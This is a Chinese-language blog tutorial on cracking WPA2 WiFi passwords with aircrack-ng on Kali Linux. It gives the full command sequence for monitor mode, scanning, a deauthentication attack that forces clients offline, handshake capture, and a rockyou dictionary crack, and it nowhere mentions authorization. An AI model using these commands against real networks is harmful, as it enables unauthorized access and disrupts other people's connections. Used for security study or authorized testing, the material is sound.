Loading

DATA

kali 暴力破解WiFi
一、aircrack-ng简介Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能...
扫描右侧二维码阅读全文
01
2021/08

kali 暴力破解WiFi

一、aircrack-ng简介

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据

二、工具准备

kali、USB无线网卡,如Ralink 802.11n

三、WIFI破解过程

1、WIFI信息收集

1.1使用命令列举网卡信息,查找无线网卡名称:iwconfig

请输入图片描述

发现无线网卡wlan0

1.2开启无线网卡监听模式:airmon-ng start <无线网卡名称>
airmon-ng start wlan0
1.3查看无线网卡监听模式是否打开:iwconfig

请输入图片描述
无线网卡wlan0处于监听模式,名称为wlan0mon

1.4扫描附件wifi热点信息:airodump-ng <处于监听模式的网卡名称>
airodump-ng wlan0mon

请输入图片描述

输出的列表在不停的刷新显示。表示扫描到的无线网络 AP 信息:

BSSID: 无线 AP 的硬件地址;

PWR: 信号强度,值是负数,绝对值越小表示信号越强;

Beacons:无线AP发出的通告编号;

#Data:被捕获到的数据分组的数量(一般数据量越大,抓取握手包更容易);

#/s:过去10秒钟内每秒捕获数据分组的数量;

MB:无线AP所支持的最大速率;

CH: 无线网络信道;

ENC: 加密方式,要破解的是 WPA2;

CIPHER:加密算法;

AUTH:使用的认证协议;E

SSID: 无线网络的名称

2、握手包抓取

抓取握手包:airodump-ng -c <CH> --bssid <BSSID> -w <要保存握手包的目录> <处于监听模式的网卡名称>

airodump-ng --bssid 64:09:80:4A:A2:C9 -c 11 -w /home wlan0mon

抓包界面如下图所示:

请输入图片描述

要抓握手包,需要客户端在wifi重新认证连接的情况下才能抓到。可使用下列命令让客户端下线,以便客户端重新连接。

  • 发送反认证包,让客户端下线。客户端重新连接,便于抓取握手包:aireplay-ng -0 <发送反认证包的个数> -a <BSSID> -c <强制下线的MAC地址(STATION下面的地址)> 无线网卡名称
  • 采用Deauth攻击模式,后面紧跟攻击次数,这里设置为20,大家可以根据实际情况设置;-a:后面跟AP的mac地址;-c:后面跟客户端的mac地址。
aireplay-ng -0 20 -a 80:xx:xx:xx:xx:28 -c 18:yy:yy:yy:yy:40 wlan0mon

请输入图片描述

如此,18:yy:yy:yy:yy:40被强制下线。

当客户端再次连接wifi时,抓取80:xx:xx:xx:xx:28 与 18:yy:yy:yy:yy:40间连接的握手包:

请输入图片描述

抓到握手包之后,Ctrl+C停止抓包。查看对应目录下的包含握手信息的包:

请输入图片描述

3、WIFI密码破解

结合密码字典,使用aircrack-ng进行破解:aircrack-ng -w <本地的字典文件> <握手包>

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home-01.cap

出现KEY FOUND,则表示破解成功,括号中字符串即为密码

请输入图片描述

注意:

实操过程中,可能出现无法收集到WiFi信息的情况,拔掉无线网卡重新插入,或者重启虚拟机即可。

参考链接:利用kali破解WIFI密码

最后修改:2021 年 08 月 01 日 03 : 44 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论